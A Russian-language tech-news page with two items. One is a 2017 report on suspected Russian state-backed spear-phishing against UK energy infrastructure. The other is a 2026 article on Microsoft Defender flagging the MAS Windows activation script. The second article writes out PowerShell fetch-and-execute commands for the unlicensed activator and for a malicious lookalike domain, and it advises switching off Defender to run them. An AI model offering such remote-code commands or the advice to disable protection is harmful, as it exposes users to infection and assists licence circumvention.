Спецслужбы Великобритании: Российские хакеры атакуют инфраструктуру

Олег Иванов 19 Июля 2017 - 16:35

...

Спецслужбы Великобритании: Российские хакеры атакуют инфраструктуру

Спецслужба Великобритании, ответственная за ведение радиоэлектронной разведки и обеспечение защиты информации, предупреждает, что ряд крупных государственных объектов, относящихся к инженерной инфраструктуре, возможно, был скомпрометирован. К этому выводу спецслужба пришла после обнаружения соединений от нескольких IP-адресов, связанных со спонсируемыми государством хакерами.

На данный момент информации достаточно мало, но из нее можно сделать вывод, что пока нет никаких конкретных подтвержденных скомпрометированных объектов.

Как утверждается, хакерами использовался целевой фишинг.

«Хакеры, поддерживаемые российским правительством, атаковали энергетические сети в некоторых частях Великобритании. Предположительно, российские киберпеступники, связанные с правительством нацелены на западный энергетический сектор» - пишет Times.

Национальный центр кибербезопасности Британии считает, что киберпреступники ищут пути проникновения в критическую инфраструктуру.

Спецслужбы точно не называют злоумышленников, но подозревают именно российских хакеров. Причиной тому, по словам The New York Times, является тот факт, что методы, используемые злоумышленниками, очень напоминают известную специалистам по кибербезопасности группу российских киберпреступников Energetic Bear.

Напомним, что Energetic Bear (также известная как Crouching Yeti), как утверждают исследователи, была причастна к атакам на энергетические сети, начавшимся в 2012 году.

Следующая главная новость »

Подписывайтесь на телеграм-канал AM Live, чтобы всегда быть в курсе самых горячих и свежих новостей. Присоединяйтесь! »

Екатерина Быстрова 09 Января 2026 - 15:02

Windows Microsoft Windows Defender Домашние пользователи Корпорации Защита персональных компьютеров Персональный антивирус Microsoft

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

Оригинальный MAS:
irm https://get.activated.win | iex
Вредоносная подделка:
irm https://get.activate.win | iex
(без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.